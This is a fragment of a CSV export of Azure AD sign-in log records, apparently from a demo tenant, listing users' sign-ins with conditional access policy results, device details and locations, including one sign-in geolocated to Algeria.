+1535,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:00.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d3a86e71-fc63-45cb-9cf7-b343206a5434,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,O365 Suite UX,4345a7b9-9a63-4910-a426-35363201d503,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:44,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",c3a7ae11-3090-46d7-95b6-d20589720700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c3a7ae11-3090-46d7-95b6-d20589720700,SigninLogs,Sucess,34.06555176,-118.2405396
+1536,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:20.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5ca0a64f-d511-445e-b6be-202dc87b6748,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office Delve,94c63fef-13a3-47bc-8074-75af8c65887a,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 35, 'displayName': 'GBB demo', 'result': 'success', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:55,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",011e8186-a783-421c-9de9-872008460600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,011e8186-a783-421c-9de9-872008460600,SigninLogs,Sucess,34.06555176,-118.2405396
+1537,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:22.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cad86ba2-98e7-46b9-80b3-e3d53f244420,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,DZ,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:56,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",85789f99-3a4c-45a5-91bc-019481ac0700,,,"{'countryOrRegion': 'DZ', 'geoCoordinates': {'longitude': 3, 'latitude': 28}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,85789f99-3a4c-45a5-91bc-019481ac0700,SigninLogs,Sucess,28,3
+1538,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:41.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5006f22d-a934-42b0-8a4c-b687d5e64584,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft Teams Web Client,5e3ce6c0-2b1f-4285-8d4b-75ee78787346,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:44,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",fd7a6355-56f5-4bc2-9ad4-c259bcf20500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,fd7a6355-56f5-4bc2-9ad4-c259bcf20500,SigninLogs,Sucess,34.06555176,-118.2405396
+1539,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:11.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,29592158-7166-406a-8157-9b7da4661331,Microsoft.aadiam,Microsoft.aadiam,,Yechiel Levin,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:55,"{'operatingSystem': 'Windows 10', 'deviceId': '8a35c785-7c5f-463a-ab5e-126c006191f1', 'browser': 'Edge 18.1836', 'displayName': 'YELEVIN-X1', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",591f75e7-d825-4353-9817-93c84b842500,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.887760162353516, 'latitude': 32.084041595458984}, 'state': 'Hamerkaz', 'city': 'Petah Tikva'}",none,none,none,none,[],{'errorCode': 0},Yechiel Levin,71505601-c694-45ce-8220-4799035a14f5,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,591f75e7-d825-4353-9817-93c84b842500,SigninLogs,Sucess,32.0840416,34.88776016
+1540,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:45.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5006f22d-a934-42b0-8a4c-b687d5e64584,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft Teams Web Client,5e3ce6c0-2b1f-4285-8d4b-75ee78787346,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:44,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",3c1797ce-9a4e-4e19-b7f0-81e0c82f0700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,3c1797ce-9a4e-4e19-b7f0-81e0c82f0700,SigninLogs,Sucess,34.06555176,-118.2405396
+1541,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:50.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,744215d9-8f9f-430f-a437-196abdf61ce6,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:44,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",3006daeb-4fa9-44e4-baa4-8ca76d1d0800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,3006daeb-4fa9-44e4-baa4-8ca76d1d0800,SigninLogs,Sucess,34.06555176,-118.2405396
+1542,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:51.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5006f22d-a934-42b0-8a4c-b687d5e64584,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft Teams Web Client,5e3ce6c0-2b1f-4285-8d4b-75ee78787346,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:44,"{'operatingSystem': 'Windows 